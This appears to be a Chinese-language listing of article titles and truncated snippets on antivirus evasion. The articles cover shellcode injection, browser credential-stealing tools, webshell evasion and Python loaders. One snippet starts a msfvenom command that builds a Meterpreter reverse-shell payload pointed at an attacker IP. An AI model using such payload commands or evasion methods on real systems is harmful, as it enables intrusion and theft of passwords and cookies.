开篇 在使用ZeroEye的新功能对全盘的Exe进行扫描时发现一个程序的名称比较可疑:loaddll.exe通过名称来看大概知道是加载dll,那么既然是有签名的,意味着我们在跟数字杀软对...
免杀思路扩展
欢迎加入我的知识星球,目前正在更新免杀相关的东西,129/永久,每100人加29,每周更新2-3篇上千字PDF文档。文档中会详细描述。目前已更新83+ PDF文档,《2025年了,人生中最好的投资就是...
【免杀思路】某60 SHELLCODE注入探测
0x00 免责声明!本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号团队不为此承担任何责任。0x01 进程注入介绍!shell...
浅析HackBrowserData原理以及免杀思路
前言 声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者和本公众号无关。 书接上...
浅析HackBrowserData原理以及免杀思路(红队工具之获取目标机器浏览器记录 密码 cookie)
前言声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者和本公众号无关。书接上回:...
Jsp两种免杀思路
获黑客教程免费&进群冰蝎,哥斯拉,有可能落地就被查杀,这两者的特征方式太过于明显,这篇文章主要是讲两个免杀,一个是动态写入文件,一个是websocket其实动态写入比较简单,会有痕迹,不管以反...
基于Python分离免杀思路
声明:请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。大家好,X师傅又和大家见面啦,今天为大家带来python分离免杀的思路分享分离免杀:重要的是分离,无代码落...
写外挂时偶然想到的免杀思路
源码:H4ckBu7eer-EX/pymem_shellcodeloader: pymem加载shellcode到其他进程 (github.com)各位大佬端午好!最近在研究游戏逆向的时候,发现一个好...
洞见简报【2023/6/24】
2023-06-24 微信公众号精选安全技术文章总览洞见网安 2023-06-24 0x1 写外挂时偶然想到的免杀思路HB网络安全探究实验室 2023-06-24 15:42:39写外挂时偶...
技术分享 | Msf免杀思路分享
1Part.1首先我们打开终端输入此项命令生成python文件用来上线MSFmsfvenom -p python/meterpreter_reverse_http LHOST=<IP> L...
干货 | Windows下免杀思路总结
扫码领资料获黑客教程免费&进群1.简介在安全厂商日趋成熟的背景下,编写免杀马的难度和成本日益增长。好用新兴的开源项目在短时间内就被分析并加入特征库。调研了部分开源项目,其中也有项目做了类似的分...